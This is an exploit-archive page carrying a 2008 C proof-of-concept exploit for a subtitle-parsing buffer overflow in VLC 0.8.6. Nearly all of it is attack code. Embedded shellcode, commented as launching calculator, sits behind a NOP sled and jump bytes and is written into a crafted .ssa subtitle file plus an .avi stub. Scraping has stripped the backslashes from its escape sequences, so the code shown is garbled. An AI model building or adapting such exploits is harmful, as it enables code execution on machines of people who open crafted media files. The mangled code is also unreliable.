VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit
# Published : 2008-03-14
# Author : Mai Xuan Cuong
# Previous Title : Microsoft Office Excel Code Execution Exploit (MS08-014)
# Next Title : Solaris 8/9/10 fifofs I_PEEK Local Kernel memory Leak Exploit

/*
VLC <=0.8.6.e
Subtitle parsing local buffer overflow exploit
Creadit to cuongmx@gmail.com vs Look2Me @
Tested on windows XP Pro SP2

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char ssa_header[]=
"[Script Info]rn"
"Title: VLC <= 0.8.6c,e buffer-overflowrn"
"ScriptType: v4.00rn"
"Collisions: Normalrn"
"[V4 Styles]rn"
"[Events]rn"
"Dialogue:";

// execute calculator from Meta
char shellcode[] =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x3d"
"xbaxb1xd9x83xebxfcxe2xf4xc1x52xf5xd9x3dxbax3ax9c"
"x01x31xcdxdcx45xbbx5ex52x72xa2x3ax86x1dxbbx5ax90"
"xb6x8ex3axd8xd3x8bx71x40x91x3ex71xadx3ax7bx7bxd4"
"x3cx78x5ax2dx06xeex95xddx48x5fx3ax86x19xbbx5axbf"
"xb6xb6xfax52x62xa6xb0x32xb6xa6x3axd8xd6x33xedxfd"
"x39x79x80x19x59x31xf1xe9xb8x7axc9xd5xb6xfaxbdx52"
"x4dxa6x1cx52x55xb2x5axd0xb6x3ax01xd9x3dxbax3axb1"
"x01xe5x80x2fx5dxecx38x21xbex7axcax89x55xc4x69x3b"
"x4exd2x29x27xb7xb4xe6x26xdaxd9xd0xb5x5exbaxb1xd9";

char szJMP[]=
"x90x90xe9x38xffxffxffxebxf9x90x90x0bx0bx38x00";

char szAVI[]=
"x52x49x46x46xCx0x0x0x41x56x49x20x4Cx49x53x54x00x00x00";

main()
{
    int i,j,k;
    printf("Give me your VLC version:rn");
    printf("1> version 8.06.crn");
    printf("2> version 8.06.drn");
    printf("3> version 8.06.ernChose:");
    j=getchar();
    switch(j)
    {
        case '1': k=165254;break;
        case '2': printf("rnI haven't got this version!rn Good Luck :-)");
                  getchar();
                  return 0;break;
        case '3': k=165286;break;
    }
    k=k-sizeof(shellcode);
    printf("rn[+] Creating .ssa file ...");
    FILE*    f;
    char    szBuffer[170000];
    char    szBuffer2[200];

    strcpy(szBuffer,ssa_header);    // header of ssa
    
    memset((szBuffer+sizeof(ssa_header)-1),'x90',k);
    szBuffer[k+sizeof(ssa_header)]='x00';
    strcpy(szBuffer2,shellcode);
    strcat(szBuffer2,szJMP);
    strcat(szBuffer,szBuffer2);
    
    f=fopen("Bof-VLC.ssa","wb");
    if(f==NULL)
    {
        printf("Can't create file");
        exit;
    }
    fwrite(szBuffer,1,strlen(szBuffer),f);  // write header
    fclose(f);
    printf("rn[+] .ssa file successfully create!");
	
	printf("rn[+] Creation .avi file ...");
    f=fopen("Bof-VLC.avi","wb");
    if(f==NULL)
    {
        printf("Can't create file");
        exit;
    }
    fwrite(szAVI,1,sizeof(szAVI),f);  // write header
    fclose(f);	
    printf("rn[+] .avi file successfully create!");
    getchar();
}

// www.Syue.com [2008-03-14]